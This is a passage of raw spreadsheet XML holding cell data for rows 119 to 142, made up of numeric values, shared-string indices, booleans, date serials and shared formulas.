        <v>51</v>
      </c>
      <c r="F119" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G119" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H119" s="4">
        <v>44776.74652777778</v>
      </c>
      <c r="I119" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J119" s="1" t="s">
        <v>645</v>
      </c>
      <c r="K119" s="2" t="s">
        <v>646</v>
      </c>
      <c r="L119" s="1">
        <v>5.0</v>
      </c>
      <c r="M119" s="1">
        <v>18.0</v>
      </c>
      <c r="N119" s="1" t="s">
        <v>647</v>
      </c>
      <c r="O119" s="1" t="s">
        <v>648</v>
      </c>
      <c r="P119" s="1" t="s">
        <v>39</v>
      </c>
      <c r="Q119" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R119" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S119" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="1">
        <v>1200.0</v>
      </c>
      <c r="B120" s="2" t="s">
        <v>649</v>
      </c>
      <c r="C120" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D120" s="2" t="s">
        <v>644</v>
      </c>
      <c r="E120" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F120" s="1" t="s">
        <v>650</v>
      </c>
      <c r="G120" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H120" s="4">
        <v>44776.756944444445</v>
      </c>
      <c r="I120" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J120" s="1" t="s">
        <v>645</v>
      </c>
      <c r="K120" s="2" t="s">
        <v>646</v>
      </c>
      <c r="L120" s="1">
        <v>5.0</v>
      </c>
      <c r="M120" s="1">
        <v>18.0</v>
      </c>
      <c r="N120" s="1" t="s">
        <v>104</v>
      </c>
      <c r="O120" s="1" t="s">
        <v>648</v>
      </c>
      <c r="P120" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q120" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R120" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S120" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="1">
        <v>1201.0</v>
      </c>
      <c r="B121" s="2" t="s">
        <v>651</v>
      </c>
      <c r="C121" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D121" s="2" t="s">
        <v>644</v>
      </c>
      <c r="E121" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F121" s="1" t="s">
        <v>652</v>
      </c>
      <c r="G121" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H121" s="4">
        <v>44776.75902777778</v>
      </c>
      <c r="I121" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J121" s="1" t="s">
        <v>645</v>
      </c>
      <c r="K121" s="2" t="s">
        <v>646</v>
      </c>
      <c r="L121" s="1">
        <v>5.0</v>
      </c>
      <c r="M121" s="1">
        <v>18.0</v>
      </c>
      <c r="N121" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O121" s="1" t="s">
        <v>648</v>
      </c>
      <c r="P121" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q121" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R121" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S121" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="1">
        <v>1216.0</v>
      </c>
      <c r="B122" s="2" t="s">
        <v>653</v>
      </c>
      <c r="C122" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D122" s="2" t="s">
        <v>654</v>
      </c>
      <c r="E122" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F122" s="1" t="s">
        <v>656</v>
      </c>
      <c r="G122" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H122" s="1" t="s">
        <v>657</v>
      </c>
      <c r="I122" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J122" s="1" t="s">
        <v>658</v>
      </c>
      <c r="K122" s="2" t="s">
        <v>659</v>
      </c>
      <c r="L122" s="1">
        <v>2.0</v>
      </c>
      <c r="M122" s="1">
        <v>2.0</v>
      </c>
      <c r="N122" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O122" s="1" t="s">
        <v>660</v>
      </c>
      <c r="P122" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q122" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R122" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S122" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="1">
        <v>1218.0</v>
      </c>
      <c r="B123" s="2" t="s">
        <v>661</v>
      </c>
      <c r="C123" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D123" s="6" t="s">
        <v>662</v>
      </c>
      <c r="E123" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F123" s="1" t="s">
        <v>664</v>
      </c>
      <c r="G123" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H123" s="1" t="s">
        <v>665</v>
      </c>
      <c r="I123" s="1" t="s">
        <v>666</v>
      </c>
      <c r="J123" s="1" t="s">
        <v>667</v>
      </c>
      <c r="K123" s="2" t="s">
        <v>668</v>
      </c>
      <c r="L123" s="1">
        <v>10.0</v>
      </c>
      <c r="M123" s="1">
        <v>19.0</v>
      </c>
      <c r="N123" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O123" s="1" t="s">
        <v>669</v>
      </c>
      <c r="P123" s="1" t="s">
        <v>39</v>
      </c>
      <c r="Q123" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R123" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S123" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="1">
        <v>1241.0</v>
      </c>
      <c r="B124" s="2" t="s">
        <v>670</v>
      </c>
      <c r="C124" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D124" s="2" t="s">
        <v>671</v>
      </c>
      <c r="E124" s="2" t="s">
        <v>672</v>
      </c>
      <c r="F124" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G124" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H124" s="1" t="s">
        <v>673</v>
      </c>
      <c r="I124" s="1" t="s">
        <v>674</v>
      </c>
      <c r="J124" s="1" t="s">
        <v>675</v>
      </c>
      <c r="K124" s="2" t="s">
        <v>676</v>
      </c>
      <c r="L124" s="1">
        <v>3.0</v>
      </c>
      <c r="M124" s="1">
        <v>7.0</v>
      </c>
      <c r="N124" s="1" t="s">
        <v>677</v>
      </c>
      <c r="O124" s="1" t="s">
        <v>590</v>
      </c>
      <c r="P124" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q124" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R124" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S124" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="1">
        <v>1243.0</v>
      </c>
      <c r="B125" s="2" t="s">
        <v>678</v>
      </c>
      <c r="C125" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D125" s="2" t="s">
        <v>679</v>
      </c>
      <c r="E125" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F125" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G125" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H125" s="1" t="s">
        <v>680</v>
      </c>
      <c r="I125" s="1" t="s">
        <v>674</v>
      </c>
      <c r="J125" s="1" t="s">
        <v>675</v>
      </c>
      <c r="K125" s="2" t="s">
        <v>676</v>
      </c>
      <c r="L125" s="1">
        <v>3.0</v>
      </c>
      <c r="M125" s="1">
        <v>7.0</v>
      </c>
      <c r="N125" s="1" t="s">
        <v>681</v>
      </c>
      <c r="O125" s="1" t="s">
        <v>590</v>
      </c>
      <c r="P125" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q125" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R125" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S125" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="1">
        <v>1288.0</v>
      </c>
      <c r="B126" s="2" t="s">
        <v>682</v>
      </c>
      <c r="C126" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D126" s="2" t="s">
        <v>683</v>
      </c>
      <c r="E126" s="2" t="s">
        <v>684</v>
      </c>
      <c r="F126" s="1" t="s">
        <v>685</v>
      </c>
      <c r="G126" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H126" s="4">
        <v>44201.02847222222</v>
      </c>
      <c r="I126" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J126" s="1" t="s">
        <v>686</v>
      </c>
      <c r="K126" s="2" t="s">
        <v>687</v>
      </c>
      <c r="L126" s="1">
        <v>3.0</v>
      </c>
      <c r="M126" s="1">
        <v>4.0</v>
      </c>
      <c r="N126" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O126" s="1" t="s">
        <v>688</v>
      </c>
      <c r="P126" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q126" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R126" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S126" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="1">
        <v>1289.0</v>
      </c>
      <c r="B127" s="7" t="s">
        <v>689</v>
      </c>
      <c r="C127" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D127" s="2" t="s">
        <v>690</v>
      </c>
      <c r="E127" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F127" s="1" t="s">
        <v>500</v>
      </c>
      <c r="G127" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H127" s="4">
        <v>44201.03055555555</v>
      </c>
      <c r="I127" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J127" s="1" t="s">
        <v>686</v>
      </c>
      <c r="K127" s="2" t="s">
        <v>687</v>
      </c>
      <c r="L127" s="1">
        <v>3.0</v>
      </c>
      <c r="M127" s="1">
        <v>4.0</v>
      </c>
      <c r="N127" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O127" s="1" t="s">
        <v>688</v>
      </c>
      <c r="P127" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q127" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R127" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S127" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="1">
        <v>1292.0</v>
      </c>
      <c r="B128" s="2" t="s">
        <v>691</v>
      </c>
      <c r="C128" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D128" s="2" t="s">
        <v>692</v>
      </c>
      <c r="E128" s="2" t="s">
        <v>693</v>
      </c>
      <c r="F128" s="1" t="s">
        <v>694</v>
      </c>
      <c r="G128" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H128" s="4">
        <v>44234.525</v>
      </c>
      <c r="I128" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J128" s="1" t="s">
        <v>695</v>
      </c>
      <c r="K128" s="2" t="s">
        <v>696</v>
      </c>
      <c r="L128" s="1">
        <v>8.0</v>
      </c>
      <c r="M128" s="1">
        <v>8.0</v>
      </c>
      <c r="N128" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O128" s="1" t="s">
        <v>697</v>
      </c>
      <c r="P128" s="1" t="s">
        <v>698</v>
      </c>
      <c r="Q128" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R128" s="2">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="S128" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="1">
        <v>1293.0</v>
      </c>
      <c r="B129" s="2" t="s">
        <v>699</v>
      </c>
      <c r="C129" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D129" s="2" t="s">
        <v>692</v>
      </c>
      <c r="E129" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F129" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G129" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H129" s="4">
        <v>44234.529861111114</v>
      </c>
      <c r="I129" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J129" s="1" t="s">
        <v>695</v>
      </c>
      <c r="K129" s="2" t="s">
        <v>696</v>
      </c>
      <c r="L129" s="1">
        <v>8.0</v>
      </c>
      <c r="M129" s="1">
        <v>8.0</v>
      </c>
      <c r="N129" s="1" t="s">
        <v>700</v>
      </c>
      <c r="O129" s="1" t="s">
        <v>697</v>
      </c>
      <c r="P129" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q129" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R129" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S129" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="1">
        <v>1294.0</v>
      </c>
      <c r="B130" s="2" t="s">
        <v>701</v>
      </c>
      <c r="C130" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D130" s="2" t="s">
        <v>702</v>
      </c>
      <c r="E130" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F130" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G130" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H130" s="4">
        <v>44234.592361111114</v>
      </c>
      <c r="I130" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J130" s="1" t="s">
        <v>695</v>
      </c>
      <c r="K130" s="2" t="s">
        <v>696</v>
      </c>
      <c r="L130" s="1">
        <v>8.0</v>
      </c>
      <c r="M130" s="1">
        <v>8.0</v>
      </c>
      <c r="N130" s="1" t="s">
        <v>334</v>
      </c>
      <c r="O130" s="1" t="s">
        <v>697</v>
      </c>
      <c r="P130" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q130" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R130" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S130" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="1">
        <v>1295.0</v>
      </c>
      <c r="B131" s="2" t="s">
        <v>704</v>
      </c>
      <c r="C131" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D131" s="2" t="s">
        <v>705</v>
      </c>
      <c r="E131" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F131" s="1" t="s">
        <v>197</v>
      </c>
      <c r="G131" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H131" s="4">
        <v>44234.652083333334</v>
      </c>
      <c r="I131" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J131" s="1" t="s">
        <v>695</v>
      </c>
      <c r="K131" s="2" t="s">
        <v>696</v>
      </c>
      <c r="L131" s="1">
        <v>8.0</v>
      </c>
      <c r="M131" s="1">
        <v>8.0</v>
      </c>
      <c r="N131" s="1" t="s">
        <v>706</v>
      </c>
      <c r="O131" s="1" t="s">
        <v>697</v>
      </c>
      <c r="P131" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q131" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R131" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S131" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="1">
        <v>1296.0</v>
      </c>
      <c r="B132" s="2" t="s">
        <v>707</v>
      </c>
      <c r="C132" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D132" s="2" t="s">
        <v>708</v>
      </c>
      <c r="E132" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F132" s="1" t="s">
        <v>709</v>
      </c>
      <c r="G132" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H132" s="4">
        <v>44234.65972222222</v>
      </c>
      <c r="I132" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J132" s="1" t="s">
        <v>695</v>
      </c>
      <c r="K132" s="2" t="s">
        <v>696</v>
      </c>
      <c r="L132" s="1">
        <v>8.0</v>
      </c>
      <c r="M132" s="1">
        <v>8.0</v>
      </c>
      <c r="N132" s="1" t="s">
        <v>28</v>
      </c>
      <c r="O132" s="1" t="s">
        <v>697</v>
      </c>
      <c r="P132" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q132" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R132" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S132" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="1">
        <v>1297.0</v>
      </c>
      <c r="B133" s="2" t="s">
        <v>710</v>
      </c>
      <c r="C133" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D133" s="2" t="s">
        <v>711</v>
      </c>
      <c r="E133" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F133" s="1" t="s">
        <v>712</v>
      </c>
      <c r="G133" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H133" s="4">
        <v>44262.38263888889</v>
      </c>
      <c r="I133" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J133" s="1" t="s">
        <v>695</v>
      </c>
      <c r="K133" s="2" t="s">
        <v>696</v>
      </c>
      <c r="L133" s="1">
        <v>8.0</v>
      </c>
      <c r="M133" s="1">
        <v>8.0</v>
      </c>
      <c r="N133" s="1" t="s">
        <v>713</v>
      </c>
      <c r="O133" s="1" t="s">
        <v>697</v>
      </c>
      <c r="P133" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q133" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R133" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S133" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="1">
        <v>1298.0</v>
      </c>
      <c r="B134" s="2" t="s">
        <v>714</v>
      </c>
      <c r="C134" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D134" s="2" t="s">
        <v>715</v>
      </c>
      <c r="E134" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F134" s="1" t="s">
        <v>716</v>
      </c>
      <c r="G134" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H134" s="4">
        <v>44262.740277777775</v>
      </c>
      <c r="I134" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J134" s="1" t="s">
        <v>695</v>
      </c>
      <c r="K134" s="2" t="s">
        <v>696</v>
      </c>
      <c r="L134" s="1">
        <v>8.0</v>
      </c>
      <c r="M134" s="1">
        <v>8.0</v>
      </c>
      <c r="N134" s="1" t="s">
        <v>717</v>
      </c>
      <c r="O134" s="1" t="s">
        <v>697</v>
      </c>
      <c r="P134" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q134" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R134" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S134" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="1">
        <v>1299.0</v>
      </c>
      <c r="B135" s="2" t="s">
        <v>718</v>
      </c>
      <c r="C135" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D135" s="2" t="s">
        <v>719</v>
      </c>
      <c r="E135" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F135" s="1" t="s">
        <v>720</v>
      </c>
      <c r="G135" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H135" s="4">
        <v>44293.91527777778</v>
      </c>
      <c r="I135" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J135" s="1" t="s">
        <v>695</v>
      </c>
      <c r="K135" s="2" t="s">
        <v>696</v>
      </c>
      <c r="L135" s="1">
        <v>8.0</v>
      </c>
      <c r="M135" s="1">
        <v>8.0</v>
      </c>
      <c r="N135" s="1" t="s">
        <v>721</v>
      </c>
      <c r="O135" s="1" t="s">
        <v>697</v>
      </c>
      <c r="P135" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q135" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R135" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S135" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="1">
        <v>1300.0</v>
      </c>
      <c r="B136" s="2" t="s">
        <v>722</v>
      </c>
      <c r="C136" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D136" s="2" t="s">
        <v>723</v>
      </c>
      <c r="E136" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F136" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G136" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H136" s="4">
        <v>44257.59861111111</v>
      </c>
      <c r="I136" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J136" s="1" t="s">
        <v>724</v>
      </c>
      <c r="K136" s="2" t="s">
        <v>725</v>
      </c>
      <c r="L136" s="1">
        <v>3.0</v>
      </c>
      <c r="M136" s="1">
        <v>4.0</v>
      </c>
      <c r="N136" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O136" s="1" t="s">
        <v>726</v>
      </c>
      <c r="P136" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q136" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R136" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S136" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="1">
        <v>1302.0</v>
      </c>
      <c r="B137" s="2" t="s">
        <v>727</v>
      </c>
      <c r="C137" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D137" s="2" t="s">
        <v>723</v>
      </c>
      <c r="E137" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F137" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G137" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H137" s="4">
        <v>44257.680555555555</v>
      </c>
      <c r="I137" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J137" s="1" t="s">
        <v>724</v>
      </c>
      <c r="K137" s="2" t="s">
        <v>725</v>
      </c>
      <c r="L137" s="1">
        <v>3.0</v>
      </c>
      <c r="M137" s="1">
        <v>4.0</v>
      </c>
      <c r="N137" s="1" t="s">
        <v>728</v>
      </c>
      <c r="O137" s="1" t="s">
        <v>726</v>
      </c>
      <c r="P137" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q137" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R137" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S137" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="1">
        <v>1319.0</v>
      </c>
      <c r="B138" s="2" t="s">
        <v>729</v>
      </c>
      <c r="C138" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D138" s="2" t="s">
        <v>730</v>
      </c>
      <c r="E138" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F138" s="1" t="s">
        <v>731</v>
      </c>
      <c r="G138" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H138" s="4">
        <v>44626.916666666664</v>
      </c>
      <c r="I138" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J138" s="1" t="s">
        <v>732</v>
      </c>
      <c r="K138" s="2" t="s">
        <v>733</v>
      </c>
      <c r="L138" s="1">
        <v>4.0</v>
      </c>
      <c r="M138" s="1">
        <v>4.0</v>
      </c>
      <c r="N138" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O138" s="1" t="s">
        <v>734</v>
      </c>
      <c r="P138" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q138" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R138" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S138" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="1">
        <v>1320.0</v>
      </c>
      <c r="B139" s="2" t="s">
        <v>735</v>
      </c>
      <c r="C139" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D139" s="2" t="s">
        <v>736</v>
      </c>
      <c r="E139" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F139" s="1" t="s">
        <v>737</v>
      </c>
      <c r="G139" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H139" s="4">
        <v>44626.94236111111</v>
      </c>
      <c r="I139" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J139" s="1" t="s">
        <v>732</v>
      </c>
      <c r="K139" s="2" t="s">
        <v>733</v>
      </c>
      <c r="L139" s="1">
        <v>4.0</v>
      </c>
      <c r="M139" s="1">
        <v>4.0</v>
      </c>
      <c r="N139" s="1" t="s">
        <v>738</v>
      </c>
      <c r="O139" s="1" t="s">
        <v>734</v>
      </c>
      <c r="P139" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q139" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R139" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S139" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="1">
        <v>1323.0</v>
      </c>
      <c r="B140" s="2" t="s">
        <v>739</v>
      </c>
      <c r="C140" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D140" s="2" t="s">
        <v>740</v>
      </c>
      <c r="E140" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F140" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G140" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H140" s="4">
        <v>43990.44097222222</v>
      </c>
      <c r="I140" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J140" s="1" t="s">
        <v>743</v>
      </c>
      <c r="K140" s="2" t="s">
        <v>744</v>
      </c>
      <c r="L140" s="1">
        <v>1.0</v>
      </c>
      <c r="M140" s="1">
        <v>1.0</v>
      </c>
      <c r="N140" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O140" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P140" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q140" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R140" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S140" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="1">
        <v>1324.0</v>
      </c>
      <c r="B141" s="2" t="s">
        <v>745</v>
      </c>
      <c r="C141" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D141" s="2" t="s">
        <v>746</v>
      </c>
      <c r="E141" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F141" s="1" t="s">
        <v>747</v>
      </c>
      <c r="G141" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H141" s="4">
        <v>43625.48888888889</v>
      </c>
      <c r="I141" s="1" t="s">
        <v>748</v>
      </c>
      <c r="J141" s="1" t="s">
        <v>749</v>
      </c>
      <c r="K141" s="2" t="s">
        <v>750</v>
      </c>
      <c r="L141" s="1">
        <v>3.0</v>
      </c>
      <c r="M141" s="1">
        <v>3.0</v>
      </c>
      <c r="N141" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O141" s="1" t="s">
        <v>751</v>
      </c>
      <c r="P141" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q141" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R141" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S141" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="1">
        <v>1503.0</v>
      </c>
      <c r="B142" s="2" t="s">
        <v>752</v>
      </c>
      <c r="C142" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D142" s="2" t="s">
        <v>753</v>
      </c>
      <c r="E142" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F142" s="1" t="s">
        <v>754</v>
      </c>
      <c r="G142" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H142" s="1" t="s">
        <v>755</v>
      </c>
      <c r="I142" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J142" s="1" t="s">
        <v>756</v>
      </c>
      <c r="K142" s="2" t="s">
        <v>757</v>
      </c>
      <c r="L142" s="1">
        <v>7.0</v>
      </c>
      <c r="M142" s="1">
        <v>8.0</v>
      </c>
      <c r="N142" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O142" s="1" t="s">
        <v>758</v>
      </c>
      <c r="P142" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q142" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R142" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S142" s="1">
